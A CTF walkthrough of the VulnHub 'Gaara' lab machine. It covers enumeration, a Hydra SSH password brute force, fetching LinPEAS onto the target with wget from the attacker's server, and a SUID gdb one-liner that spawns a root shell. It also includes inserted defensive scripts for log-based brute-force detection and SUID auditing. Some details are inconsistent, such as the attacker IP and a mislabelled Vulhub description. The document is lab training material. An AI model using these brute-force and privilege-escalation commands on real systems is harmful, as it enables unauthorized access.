Gaara: 1 || VulnHub Complete Walkthrough


Hello everyone, and welcome to this brand-new walkthrough. In today's tutorial, we will be dealing with the vulnerable machine Gaara, which is categorized as "easy" in terms of difficulty.


To begin, you'll need to download the vulnerable image from the VulnHub website. If you're not familiar with VulnHub yet, feel free to check my blog.


Vulhub - Vulnerable By Design

Vulhub is a collection of pre-built vulnerable docker environments that are designed for learning and practicing security testing. It provides various intentionally vulnerable web applications and services for hands-on security training.

After you've successfully downloaded the image, it's time to set up the machine in VirtualBox, which is a straightforward process.


Setting Up

1. Launch VirtualBox, open the "File" menu and select "Import Appliance".

2. Import the downloaded ".ova" file: browse your computer to locate the downloaded file and click "Next".

3. Review the appliance details and settings. You can keep the defaults or adjust them to your needs. Click "Finish" to begin importing.

4. Once the import is done, the "Gaara" vulnerable machine appears in the VirtualBox Manager. Select it, click "Settings", and change the network adapter to "Host-only Adapter".

Make sure that both your Kali Linux machine, which is used for performing the attacks, and your vulnerable machine are connected to the same network.

Once the setup is done, it's time to start the virtual machines. You'll notice that our vulnerable machine is all set and a login prompt is waiting for us.

Let's dive into the fun!

 

Enumeration

Enumeration is the first step of our attack. It begins with identifying the IP address of our target machine using NetDiscover. To do this, open a terminal and execute the following command:

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1  

 Currently scanning: 192.168.101.0/16   |   Screen View: Unique Hosts                                                           
                                                                                                                                
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
  192.168.95.112  08:00:27:d1:4d:5f      2     120  PCS Systemtechnik GmbH                                                       
 192.168.95.101  08:00:27:02:55:bb      2     120  PCS Systemtechnik GmbH                                                       
 192.168.95.107  0a:00:27:00:00:0e      1      60  Unknown vendor    

From the scan result, we have obtained our target IP address, which is "192.168.95.112".


Conducting Network Scans with Nmap

Next, we perform a network scan to detect which ports are open. Scanning the network is an essential part of the enumeration process: it lets us understand the attack surface and plan targeted attacks. For this purpose, we'll use the popular Nmap tool with the following command, where:

  • -A enables aggressive scanning: it detects the target's OS, identifies service versions on open ports, and runs the default NSE scripts.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -A 192.168.95.112
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-24 15:15 EDT
Nmap scan report for 192.168.95.112
Host is up (0.0011s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 3ea36f6403331e76f8e498febee98e58 (RSA)
|   256 6c0eb500e742444865effed77ce664d5 (ECDSA)
|_  256 b751f2f9855766a865542e05f940d2f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Gaara
MAC Address: 08:00:27:D1:4D:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.09 ms 192.168.95.112

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.51 seconds
                                                                                                                                 
┌──(kali㉿kali)-[~]
└─$

From the network scan, we have spotted two open ports:

  • Port 22/TCP running an SSH service, indicating that, with valid credentials, gaining login access to the server will be straightforward.
  • Port 80/TCP running an HTTP service, suggesting a vulnerable website is being hosted.


Web Enumeration

Now, let's explore the content of the website running on port 80. To look at it ourselves, open a web browser of your choice and navigate to the target's IP address in the URL bar at the top of the window.

Upon visiting the webpage, we notice that it only contains an image; there is no other significant content.


Performing Directory Enumeration with Gobuster

To further enumerate the target URL, we need to perform directory busting to discover hidden or hard-to-find directories and pages. We'll use "gobuster" as our tool of choice, with the following command, where:

  • dir selects the directory-enumeration mode,
  • -u specifies the target URL, and
  • -w specifies the path of the wordlist.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.95.112/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt   
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.95.112/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/24 15:19:31 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
/Cryoserver           (Status: 200) [Size: 327]

===============================================================
2023/07/24 15:20:46 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ 

The directory busting finds two pages. One returns a 403 status code, meaning we can't access it, so we proceed to visit the second one, "/Cryoserver".

Although the Cryoserver page seems blank at first, scrolling to the bottom reveals three lines of words that appear to be the names of further pages. Let's examine each one individually to check for any useful information.

On the "/iamGaara" page, we come across a string of characters that appears to be encoded.


Decoding Encoded Text Using CyberChef

Now, let's try to decode it using CyberChef. If you don't know what it is, watch this video first.

CyberChef - The Cyber Swiss Army Knife

CyberChef is a powerful web application for encrypting, decrypting, and analyzing data. It provides a wide range of cryptographic, encoding, and data manipulation tools, making it a valuable asset for cybersecurity professionals and enthusiasts.


Paste the encoded string into the input section. In the operations search box, type "from base" to list the "From Base…" operations, then drag each of them into the recipe in turn until the output becomes readable.


Using CyberChef this way, we successfully decode the text, which reads "gaara:ismyname". The word "gaara" appears to be a username.


Bruteforcing SSH Login Passwords with Hydra

Since the SSH service is running on port 22 and we now have a valid username, our next step is to perform a brute-force attack to find the password. We'll use "Hydra" for this, along with the rockyou.txt wordlist. Type the following command:

┌──(kali㉿kali)-[~]
└─$ hydra -l gaara -P /usr/share/wordlists/rockyou.txt -t 30 ssh://192.168.95.112
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-24 15:43:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 30 tasks per 1 server, overall 30 tasks, 14344399 login tries (l:1/p:14344399), ~478147 tries per task
[DATA] attacking ssh://192.168.95.112:22/
[22][ssh] host: 192.168.95.112   login: gaara   password: iloveyou2
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-24 15:44:43
                                                                                                                             
┌──(kali㉿kali)-[~]
└─$

Upon successful brute-forcing, we obtain the password associated with the "gaara" username.

Now that we have a valid username and its corresponding password, we can use an SSH client to log into the server, giving us a foothold from which to proceed further with our attack.
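From the defender's side, a Hydra run like the one above leaves a dense burst of "Failed password" entries in the target's /var/log/auth.log, followed by an "Accepted password" from the same source once the guess succeeds. The following Python script is an added example for this walkthrough (it is not the author's code and not part of the Gaara box): it parses sshd log lines in the standard Debian syslog format, counts failures per source IP inside a sliding time window, and then reports any successful login from a source that was flagged. The log lines embedded in it are constructed to mirror the attack shown above, and the threshold and window values are assumptions to tune per environment.

```python
"""Detect SSH password-guessing bursts in sshd auth.log lines.

Added example for this walkthrough (not the author's code). The Hydra run
above produces many "Failed password" entries on the target; this parser
groups failures by source IP inside a sliding window and reports sources
that exceed a threshold. The log lines below are constructed to match the
standard Debian sshd syslog format.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample: a burst of failures from the attacking host, one
# failure from another host, and the eventual success for the guessed password.
SAMPLE_AUTH_LOG = """\
Jul 24 15:43:48 Gaara sshd[2011]: Failed password for gaara from 192.168.95.101 port 50122 ssh2
Jul 24 15:43:48 Gaara sshd[2012]: Failed password for gaara from 192.168.95.101 port 50124 ssh2
Jul 24 15:43:49 Gaara sshd[2013]: Failed password for invalid user admin from 192.168.95.101 port 50126 ssh2
Jul 24 15:43:50 Gaara sshd[2014]: Failed password for gaara from 192.168.95.107 port 41000 ssh2
Jul 24 15:43:51 Gaara sshd[2015]: Failed password for gaara from 192.168.95.101 port 50130 ssh2
Jul 24 15:44:40 Gaara sshd[2099]: Accepted password for gaara from 192.168.95.101 port 51010 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_line(line, year=2023):
    """Return (timestamp, result, user, ip) or None for lines that do not match.

    syslog timestamps carry no year, so one is assumed (2023 matches the
    session above).
    """
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def find_bruteforce_sources(log_text, threshold=3, window_seconds=60):
    """Return {ip: peak_failures_in_window} for IPs that reach the threshold."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still in window
    flagged = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None or parsed[1] != "Failed":
            continue
        ts, _, _, ip = parsed
        q = recent[ip]
        q.append(ts)
        # drop failures that fell out of the window (q is never emptied: ts itself stays)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged


def successes_after_bruteforce(log_text, flagged):
    """Accepted logins from flagged IPs: the signal that a guess succeeded."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed and parsed[1] == "Accepted" and parsed[3] in flagged:
            hits.append((parsed[2], parsed[3]))
    return hits


if __name__ == "__main__":
    flagged = find_bruteforce_sources(SAMPLE_AUTH_LOG)
    print("brute-force sources:", flagged)
    print("successful logins from them:", successes_after_bruteforce(SAMPLE_AUTH_LOG, flagged))
```

On the sample data the attacking host is flagged with four failures inside the window and its later successful login is reported; the host with a single failure is not. The same logic, fed from a real auth.log, is what tools such as fail2ban implement, and the usual mitigations are rate limiting or banning the source, key-only authentication, and MaxAuthTries in sshd_config.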

 

Foothold

Now that we have a valid username and password, we can establish a foothold on the server by logging in with an SSH client.


Establishing SSH Connection with Username and Password Authentication

First, open a terminal and type the following command:

┌──(kali㉿kali)-[~]
└─$ ssh gaara@192.168.95.112

After pressing Enter, the SSH client attempts to connect to the SSH server. If the username is valid, it prompts us for that user's password.

┌──(kali㉿kali)-[~]
└─$ ssh gaara@192.168.95.112
The authenticity of host '192.168.95.112 (192.168.95.112)' can't be established.
ED25519 key fingerprint is SHA256:XpX1VX2RtX8OaktJHdq89ZkpLlYvr88cebZ0tPZMI0I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])?

Type "yes" to accept the host key without verifying its authenticity. Next, we enter the password for the user.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.95.112' (ED25519) to the list of known hosts.
gaara@192.168.95.112's password: iloveyou2
Linux Gaara 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Dec 13 17:00:37 2020 from 192.168.1.107
gaara@Gaara:~$

Now we have a foothold on the server. The next objective is to find the user flag. Execute the "ls" command to list files and directories, then use "cat" followed by the flag's filename to view its content.

gaara@Gaara:~$ ls
flag.txt   Kazekage.txt                                                                                                        
gaara@Gaara:~$ cat flag.txt 
5451d3eb27acb16c652277d30945ab1e                                                                                              
gaara@Gaara:~$

As you can see, we have successfully obtained the user flag. Now, our main focus is to acquire the root flag.

gaara@Gaara:~$ cd /root                                                                                                           
-bash: cd: /root: Permission denied                                                                                              
gaara@Gaara:~$

Navigating to the root directory to obtain the root flag requires root permission, which we clearly lack. Therefore, let's proceed with privilege escalation to elevate our privileges and gain access to the root flag.

 

Privilege Escalation

During privilege escalation, the first step is to gather information about the system and identify potential vulnerabilities or misconfigurations that could let us elevate our privileges to the root level.

First, enumerate user permissions to check the user's privileges and rights on the system. This can be done by running commands such as "sudo -l" or "id" to see which commands the current user can run with elevated privileges.

Let's run the "id" command to find out the user and group names and their numeric IDs (UID and GID) for the current user.

gaara@Gaara:~$ id
uid=1001(gaara) gid=1001(gaara) groups=1001(gaara)    
gaara@Gaara:~$

Running the "id" command shows that the UID and the only group both belong to the user "gaara".

Now, let's determine the rights and privileges of the current user by executing "sudo -l". The output shows that the user "gaara" does not have any sudo privileges.

gaara@Gaara:~$ sudo -l                                                                           
sudo: unable to resolve host Gaara: Temporary failure in name resolution                                                         
[sudo] password for gaara:                                                                                                       
Sorry, user gaara may not run sudo on Gaara.                                                                                     
gaara@Gaara:~$

Our only option now is to search for a way to escalate privileges, and there may be a hint to guide us. There is another text file in the same directory, which I believe is a clue left by the creator. Let's investigate it further.

gaara@Gaara:~$ ls  
flag.txt  Kazekage.txt                                                                                                                                                                                                          
gaara@Gaara:~$ cat Kazekage.txt 
You can find Kazekage here....                                                                                                   
                                                                                                                                 
L3Vzci9sb2NhbC9nYW1lcw==                                                                                                         
gaara@Gaara:~$ 

Inside this file there is a Base64-encoded string. Let's use CyberChef to decode it.

After decoding, we obtain a directory path, which appears to be a hint for privilege escalation.

Next, let's navigate to this directory and list all files, including hidden ones, with "ls -al".

gaara@Gaara:~$ cd /usr/local/games                                                                                                
gaara@Gaara:/usr/local/games$ ls -al                                                                                              
total 12                                                                                                                         
drwx------  2 gaara gaara 4096 Jul 25 09:12 .                                                                                    
drwxr-xr-x 10 root  root  4096 Dec 13  2020 ..                                                                                   
-rw-r--r--  1 gaara gaara 1505 Dec 13  2020 .supersecret.txt                                                                     
gaara@Gaara:/usr/local/games$

Among the results, we find another file named ".supersecret.txt". Let's open it with "cat".

gaara@Gaara:/usr/local/games$ cat .supersecret.txt 
                                                                                                                                 
Godaime Kazekage:                                                                                                                
                                                                                                                                 
+++++ +++[- >++++ ++++< ]>+++ +.<++ ++++[ ->+++ +++<] >+.-- ---.< +++++                                                          
+++[- >---- ----< ]>--- -.<++ +++++ ++[-> +++++ ++++< ]>+++ +++++ .<+++                                                          
[->-- -<]>- .++++ ++.<+ +++++ +++[- >---- ----- <]>-- --.<+ +++++ +++[-                                                          
>++++ +++++ <]>+. <+++[ ->--- <]>-- --.-- --.<+ ++[-> +++<] >++.. <+++[                                                          
->+++ <]>++ ++.<+ +++++ +++[- >---- ----- <]>-- ----- -.<++ +++++ ++[->                                                          
+++++ ++++< ]>+++ .<+++ [->-- -<]>- --.+. +++++ .---. <++++ ++++[ ->---                                                          
----- <]>-- ----- ----. <++++ +++++ [->++ +++++ ++<]> +++++ +++.< +++[-                                                          
>---< ]>-.+ +++++ .<+++ +++++ +[->- ----- ---<] >---- .<+++ +++++ [->++                                                          
+++++ +<]>+ ++.<+ ++[-> +++<] >+++. +++++ +.--- ----- -.--- ----- .<+++                                                          
+++++ [->-- ----- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++
+++.< +++[- >---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ ++[->
+++++ ++++< ]>++. ----. --.-- ----- -.<++ +[->+ ++<]> +++++ +.<++ +[->-
--<]> ---.+ .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- ----- .<+++
+++++ +[->+ +++++ +++<] >+++. <+++[ ->--- <]>-- -.--- ----. <++++ [->++
++<]> +++.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ ++[-> +++++ +++<]
>++++ +.--- -.<++ ++[-> ++++< ]>++. <+++[ ->--- <]>-. +++.< +++[- >+++<
]>+++ +.<++ +++++ [->-- ----- <]>-- ----- --.<+ ++++[ ->--- --<]> -----
-.<++ +++++ [->++ +++++ <]>++ +.<++ +++[- >++++ +<]>+ ++++. +++++ ++.<+
+++++ +++[- >---- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >++++ .<+++
++[-> +++++ <]>.< ++++[ ->+++ +<]>+ .<+++ [->-- -<]>- ----. +.<++ +[->+
++<]> ++++. <++++ +++++ [->-- ----- --<]> .<
gaara@Gaara:/usr/local/games$

Inside this file we see text that appears to be a Brainfuck program. To run it, we can use an online Brainfuck interpreter (a quick Google search turns one up).

Once there, paste the text and run it. The output reveals the message: "It is not easy to find something! Try harder".

Now, our best option is to use LinPEAS. LinPEAS is a powerful script that extracts a wide range of information, including SUID binaries, known vulnerabilities and more, which can aid in privilege escalation.
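Rather than pasting the hint into a website, it can be decoded offline. The interpreter below is an added example for this walkthrough, not the author's code and not anything from the Gaara box. Brainfuck has eight commands (`<>+-.,[]`) and every other character is ignored, which is why the spaces in .supersecret.txt are harmless. The interpreter precomputes bracket matches so an unbalanced program is rejected before it runs, uses 8-bit wrapping cells (the convention most online interpreters follow, assumed here), and carries a step limit so a looping program cannot hang the shell. The sample program embedded in it is constructed; to decode the real hint, save the text from .supersecret.txt to a file and pass its path.

```python
"""Minimal Brainfuck interpreter.

Added example for this walkthrough (not the author's or the box's code) so
the .supersecret.txt hint can be decoded offline. Brainfuck has eight
commands; every other character (including the spaces in the hint) is
ignored. Bracket matching is computed up front so unbalanced programs fail
fast instead of looping forever.
"""


def build_jump_table(code):
    """Map each '[' to its matching ']' and back; raise on imbalance."""
    stack, jumps = [], {}
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at position {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at position {stack[-1]}")
    return jumps


def run_brainfuck(program, input_bytes=b"", max_steps=10_000_000):
    """Execute a Brainfuck program and return its output as a str.

    Cells are 8-bit and wrap (assumed convention), the tape grows to the
    right on demand, and max_steps guards against a program that never
    terminates.
    """
    code = [c for c in program if c in "<>+-.,[]"]   # drop whitespace and noise
    jumps = build_jump_table(code)
    tape, ptr, pc, inp = [0], 0, 0, 0
    out = bytearray()
    steps = 0
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        c = code[pc]
        if c == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)
        elif c == "<":
            if ptr == 0:
                raise IndexError("tape pointer moved below cell 0")
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            # end of input reads as 0, a common convention (assumed here)
            tape[ptr] = input_bytes[inp] if inp < len(input_bytes) else 0
            inp += 1
        elif c == "[" and tape[ptr] == 0:
            pc = jumps[pc]          # skip the loop body
        elif c == "]" and tape[ptr] != 0:
            pc = jumps[pc]          # jump back to the matching '['
        pc += 1
    return out.decode("latin-1")


# Constructed sample: cell1 = 10*7 + 2 = 72 'H', cell2 = 10*10 + 1 = 101 'e',
# cell3 = 10*1 = 10 '\n'; prints "He" followed by a newline.
SAMPLE_PROGRAM = "++++++++++[>+++++++>++++++++++>+<<<-]>++.>+.>."


if __name__ == "__main__":
    import sys
    # Pass the path of a file containing the hint, or run with no argument
    # to execute the constructed sample.
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PROGRAM
    print(run_brainfuck(src), end="")
```

The loop-heavy shape of the hint (a counter cell driving a second cell up or down by a fixed amount, then a `.`) is the standard way Brainfuck emits one character at a time, so each `]>...` cluster in the file corresponds to one output byte.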


SUID Binary Privilege Escalation via GDB Debugger

To get started, you need to download LinPEAS from its GitHub repository.

PEASS-ng - Privilege Escalation Awesome Scripts SUITE new generation

PEASS-ng is a collection of privilege escalation scripts for Windows and Linux. It provides a comprehensive set of tools and scripts to assist in identifying potential privilege escalation vectors during security assessments and penetration testing.

Once you have LinPEAS, start a Python3 HTTP server in the directory containing it:

┌──(kali㉿kali)-[~/Downloads]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
192.168.95.112 - - [24/Jul/2023 15:59:57] "GET /linpeas.sh HTTP/1.1" 200 -

Then switch back to the target server and use "wget" to download LinPEAS from the IP address of the machine running the Python3 HTTP server:

gaara@Gaara:/usr/local/games$ wget http://192.168.95.102:8080/linpeas.sh
--2023-07-25 09:25:40--  http://192.168.95.102:8080/linpeas.sh                                                                   
Connecting to 192.168.95.102:8080... connected.                                                                                  
HTTP request sent, awaiting response... 200 OK                                                                                   
Length: 836054 (816K) [text/x-sh]                                                                                                
Saving to: ‘linpeas.sh’                                                                                                          
                                                                                                                                 
linpeas.sh                       100%[=======================================================>] 816.46K  --.-KB/s    in 0.007s   
                                                                                                                                 
2023-07-25 09:25:40 (111 MB/s) - ‘linpeas.sh’ saved [836054/836054]                                                              
                                                                                                                                 
gaara@Gaara:/usr/local/games$  

If you are unsure of the IP address of your host-only adapter, use the "ifconfig" command to find it.

After downloading LinPEAS onto the target, we can use "ls -al" to confirm the file exists, and then try to run it.

gaara@Gaara:/usr/local/games$ ls -al
total 832                                                                                                                        
drwx------  2 gaara gaara   4096 Jul 25 09:27 .                                                                                  
drwxr-xr-x 10 root  root    4096 Dec 13  2020 ..                                                                                 
-rw-r--r--  1 gaara gaara 836054 Jul 25 09:23 linpeas.sh                                                                         
-rw-r--r--  1 gaara gaara   1505 Dec 13  2020 .supersecret.txt                                                                   
gaara@Gaara:/usr/local/games$ ./linpeas.sh                                                                                        
-bash: ./linpeas.sh: Permission denied   
gaara@Gaara:/usr/local/games$

However, running it gives a "Permission denied" error: linpeas.sh does not have execute permission. To fix this, grant execute permission with "chmod +x linpeas.sh".

gaara@Gaara:/usr/local/games$ chmod +x linpeas.sh                                                                                
gaara@Gaara:/usr/local/games$ ls -al                                                                                             
total 832                                                                                                                        
drwx------  2 gaara gaara   4096 Jul 25 09:27 .                                                                                  
drwxr-xr-x 10 root  root    4096 Dec 13  2020 ..                                                                                 
-rwxr-xr-x   1 gaara gaara 836054 Jul 25 09:23 linpeas.sh                                                                         
-rw-r--r--  1 gaara gaara   1505 Dec 13  2020 .supersecret.txt                                                                   
gaara@Gaara:/usr/local/games$

Once the execute permission is granted, we can run "linpeas.sh" again. This time it should execute without any issues.

gaara@Gaara:/usr/local/games$ ./linpeas.sh 

After running linpeas.sh, the tool generates its output, providing comprehensive information, including SUID binaries, potential vulnerabilities and other relevant data, to aid the privilege escalation process.

Upon analyzing the LinPEAS output, I discovered in its SUID check that the gdb binary has the SUID bit set and is owned by root. A SUID debugger is a misconfiguration that allows easy privilege escalation, so this presents an opportunity to gain root privileges.
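What LinPEAS's SUID check does is straightforward to reproduce, and it is also the check an administrator should run on their own hosts. The script below is an added example written for this walkthrough (it is not LinPEAS code and not from the Gaara box): it separates the filesystem walk from the classification so the classifier can be exercised on constructed (path, mode, uid) records, lists every setuid file, splits them by owner, and highlights root-owned SUID binaries whose basename is an interpreter or debugger that can run arbitrary code from inside the program (the gdb case found here). The list of risky basenames is an assumption drawn from commonly cited GTFOBins entries, and the sample records are constructed to mimic a Debian 10 host where gdb has been made SUID.

```python
"""SUID audit in the spirit of LinPEAS's SUID check.

Added example for this walkthrough (not LinPEAS code). Scanning is split
from classification so the classifier can be tested on constructed records
without touching the real filesystem.
"""
import os
import stat

# Basenames that should essentially never carry a root SUID bit: each can
# spawn a shell or execute arbitrary code from inside the program. The set is
# an assumption based on commonly cited GTFOBins entries, not from the page.
RISKY_SUID_BASENAMES = {
    "gdb", "python", "perl", "ruby", "php", "lua",
    "vim", "vi", "nano", "less", "more", "find", "awk", "gawk", "env",
    "bash", "sh", "dash", "zsh", "tar", "zip", "cp", "mv", "tee",
}


def _normalise_basename(path):
    """Strip version suffixes such as python3.7 -> python for matching."""
    base = os.path.basename(path)
    if base.startswith("python"):
        base = base.rstrip("0123456789.")
    return base


def classify_suid_records(records):
    """records: iterable of (path, mode, owner_uid). Return a report dict.

    root_suid: SUID files owned by uid 0; other_suid: SUID files owned by
    anyone else; risky: root-owned SUID files with a risky basename.
    """
    report = {"root_suid": [], "other_suid": [], "risky": []}
    for path, mode, uid in records:
        if not (mode & stat.S_ISUID):
            continue
        bucket = "root_suid" if uid == 0 else "other_suid"
        report[bucket].append(path)
        if uid == 0 and _normalise_basename(path) in RISKY_SUID_BASENAMES:
            report["risky"].append(path)
    return report


def scan_filesystem(root="/"):
    """Walk the real filesystem and yield (path, mode, uid) for regular files.

    Uses lstat so symlinks are not followed, and skips pseudo-filesystems.
    """
    skip = {"/proc", "/sys", "/dev", "/run"}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield full, st.st_mode, st.st_uid


def remediation_command(path):
    """The fix for a risky root-SUID binary: drop the setuid bit."""
    return f"chmod u-s {path}"


# Constructed records mimicking a Debian 10 host where gdb has been made SUID.
# 0o104755 = regular file, setuid bit, rwxr-xr-x.
SAMPLE_RECORDS = [
    ("/usr/bin/passwd", 0o104755, 0),      # legitimate root SUID
    ("/usr/bin/sudo", 0o104755, 0),        # legitimate root SUID
    ("/usr/bin/gdb", 0o104755, 0),         # the misconfiguration on Gaara
    ("/usr/bin/python3.7", 0o104755, 0),   # interpreter made SUID (constructed)
    ("/usr/bin/ls", 0o100755, 0),          # no SUID bit
    ("/home/gaara/tool", 0o104755, 1001),  # SUID but owned by an unprivileged user
]


if __name__ == "__main__":
    report = classify_suid_records(SAMPLE_RECORDS)
    for path in report["risky"]:
        print(f"risky root SUID: {path}  ->  {remediation_command(path)}")
    # Uncomment to audit the live host (slow on large filesystems):
    # print(classify_suid_records(scan_filesystem())["risky"])
```

On the constructed records, passwd and sudo are reported as ordinary root SUID binaries while gdb and the SUID interpreter are flagged as risky with the corresponding `chmod u-s` fix. A periodic run of the live scan, diffed against a known-good baseline of SUID files, is the simplest way to catch this class of misconfiguration before an attacker's LinPEAS does.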

After some research on Google, I found the GTFOBins page for gdb, which documents how a SUID gdb binary can be abused to spawn a privileged shell.

GTFOBins - gdb

GTFOBins is a curated list of Unix binaries that can be exploited to bypass local security restrictions in misconfigured systems. The gdb page in GTFOBins provides information on how to use the gdb debugger for privilege escalation and other useful tricks.

gaara@Gaara:/usr/local/games$ gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit                         
GNU gdb (Debian 8.2.1-2+b3) 8.2.1                        
Copyright (C) 2018 Free Software Foundation, Inc.                                                                                
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>                                                    
This is free software: you are free to change and redistribute it.                                                               
There is NO WARRANTY, to the extent permitted by law.                                                                            
Type "show copying" and "show warranty" for details.                                                                             
This GDB was configured as "x86_64-linux-gnu".                                                                                   
Type "show configuration" for configuration details.                                                                             
For bug reporting instructions, please see:                                                                                      
<http://www.gnu.org/software/gdb/bugs/>.                                                                                         
Find the GDB manual and other documentation resources online at:                                                                 
    <http://www.gnu.org/software/gdb/documentation/>.                                                                            
                                                                                                                                 
For help, type "help".                                                                                                           
Type "apropos word" to search for commands related to "word".                                                                    
#

Apologies for the oversight with the "./" prefix when invoking gdb; after trying again without it, we successfully gained root privileges. You can verify this by running "whoami", which should now report root.

# whoami                                                                                                                         
root                                                                                                                             

To access the root flag, navigate to the root directory. Use "ls" to check whether the root.txt file exists, then use "cat" to view its content.

# cd /root                                                                                                                        
# ls                                                                                                                             
root.txt                                                                                                                         
# cat root.txt                                                                                                                   
                                                                                                                                 
                                                                                                                                 
 ██████╗  █████╗  █████╗ ██████╗  █████╗                                                                                         
██╔════╝ ██╔══██╗██╔══██╗██╔══██╗██╔══██╗                                                                                        
██║  ███╗███████║███████║██████╔╝███████║                                                                                        
██║   ██║██╔══██║██╔══██║██╔══██╗██╔══██║                                                                                        
╚██████╔╝██║  ██║██║  ██║██║  ██║██║  ██║                                                                                        
 ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝

8a763d61f71db8e7aa237055de928d86

Congrats You have Rooted Gaara.

Give the feedback on Twitter if you Root this : @0xJin

Congratulations! We've successfully completed this CTF challenge. If you have any doubts or questions about this video, feel free to write them in the comment section.
